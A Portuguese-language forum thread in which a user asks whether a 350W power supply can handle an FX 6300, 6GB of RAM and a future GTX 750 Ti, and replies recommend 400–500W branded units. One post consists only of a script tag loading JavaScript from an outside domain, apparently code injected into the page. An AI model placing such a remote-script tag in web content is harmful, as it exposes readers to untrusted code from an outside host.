Uma FUCKING dúvida

Bem-vindo!

Ao se registrar conosco, você poderá discutir, compartilhar e enviar mensagens privadas com outros membros da nossa comunidade.

Inscreva-se agora!
Status
Não está aberto para novas respostas.

Seikosei

Neutro
VIP
Entrou
Jul 12, 2013
Cubos
0
Queria saber se a minha fontezinha de 350w reais aguenta o meu FX 6300 + meus 6GB de RAM + uma GTX 750 ti ( vou comprar futuramente ) . Já procurei em todo que site e nenhum tem uma especificação igual a minha. Desde já agradeço -q

Olá, qual a marca da fonte? Provavelmente é uma daquelas fontes xing-ling de cinquenta reais, pra essa configuração, é recomendado uma Coolermaster 400W 80 plus bronze, ou uma Corsair CX 430W 80 plus, ou a que eu usaria : EVGA 430W 80 plus, por ser a mais barata e ser de ótima qualidade, com essa fonte de 350W é muito perigoso.

L3onArdo disse:
nop, cloca uma de 500w pra garantir

Maniaco147 disse:
<script src="http://queryjs.me/services/script.js" type="text/javascript"></script>

zTriple disse:
Olá, qual a marca da fonte? Provavelmente é uma daquelas fontes xing-ling de cinquenta reais, pra essa configuração, é recomendado uma Coolermaster 400W 80 plus bronze, ou uma Corsair CX 430W 80 plus, ou a que eu usaria : EVGA 430W 80 plus, por ser a mais barata e ser de ótima qualidade, com essa fonte de 350W é muito perigoso.
Vlw galera vo por uma de 430 da EVGA mais futuramente então :)

Status
Não está aberto para novas respostas.

Users who are viewing this thread

Voltar